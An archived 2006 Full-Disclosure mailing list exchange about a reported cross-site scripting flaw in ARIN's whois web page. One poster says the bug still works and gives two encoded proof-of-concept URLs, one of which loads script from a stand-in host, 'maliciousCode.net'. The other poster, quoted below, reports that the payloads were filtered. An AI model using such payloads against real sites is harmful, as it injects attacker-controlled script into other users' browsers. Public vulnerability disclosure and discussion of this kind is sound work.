| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri Mar 3 17:00:10 2006
From: Security at peadro.net (Terminal Entry)
Subject: Re: Arin.net XSS
Dave,
You need to copy and paste the full URL into your browser for the XSS to take place. All exploit examples are still working as I just verified.
<copy> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E </paste>
<copy> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E </paste>
For my second example I used a fake domain name as an example of where the malicious code could be executed. Change the "maliciouscode.net" to a domain hosting your .js code for the exploit to take effect.
Thanks,
Discovered by Terminal Entry security [.at.] peadro (.)net
-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Dave
Korn
Sent: Friday, March 03, 2006 9:53 AM
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: [Full-disclosure] Re: Arin.net XSS
"Terminal Entry" <Security@...dro.net> wrote in message
news:353A3025-099E-41C9-978B-A57B2C80AAE6@...ectl...
> Notification
> Multiple attempts to contact Arin site administrators went unanswered
Looks like someone was paying at least some attention, because none of
your examples worked when I tried them just now.
> Some demonstration exploit URLs are provided:
>
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%
28%27XSS%27%29%3B%22%3E
No match found for <IMG SRC="javascript:alert('XSS');">.
>
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalici
ousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
No match found for <XCRIPT
SRC=http://maliciousCode.net/exploit.js></XCRIPT>.
[ Funnily enough it goes bold after 'SRC=' and the rest of the thing
turns
into a borken link to "http://maliciousCode.net/exploit.js></XCRIPT>" ]
>
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%
28%27XSS%27%29%3B%22%3E
No match found for <IMG SRC="javascript:alert('XSS');">.
cheers,
DaveK
--
Can't think of a witty .sigline today....
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This
message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate,
distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your
system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this
information is strictly prohibited.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060303/1223a722/attachment.html
Powered by blists - more mailing lists